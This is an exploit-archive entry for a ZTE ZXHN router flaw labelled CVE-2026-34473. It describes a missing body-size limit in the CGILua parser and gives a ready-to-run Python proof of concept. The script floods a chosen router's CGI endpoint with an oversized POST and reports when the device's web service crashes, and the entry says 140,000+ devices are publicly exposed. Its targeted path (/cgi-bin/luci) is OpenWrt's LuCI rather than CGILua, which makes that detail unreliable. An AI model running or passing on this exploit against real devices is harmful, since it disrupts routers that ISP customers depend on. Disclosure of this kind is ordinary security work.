ZTE Routers Exploit, Unauthenticated Denial of ServiceGo BackDownload

# Exploit Title: ZTE Routers  - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed
devices
# CVE: CVE-2026-34473

# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473

# PoC (Python 3)
import requests
import sys

def dos_exploit(target, size_kb=256):
    """
    CVE-2026-34473 - Unauthenticated DoS
    Sends oversized POST body to crash ZTE CGILua web service.
    """
    url = f"http://{target}/cgi-bin/luci"
    payload = "a=" + "A" * (size_kb * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"[+] {target} responded with HTTP {r.status_code} (device
may still be up)")
    except requests.exceptions.ConnectionError:
        print(f"[!] {target} - Connection refused or dropped: device web
service likely crashed (DoS successful)")
    except requests.exceptions.Timeout:
        print(f"[!] {target} - Timeout: device web service unresponsive
(DoS successful)")
    except Exception as e:
        print(f"[-] {target}: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: poc.py <target_ip> [payload_size_kb]")
        sys.exit(1)
    size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    dos_exploit(sys.argv[1], size)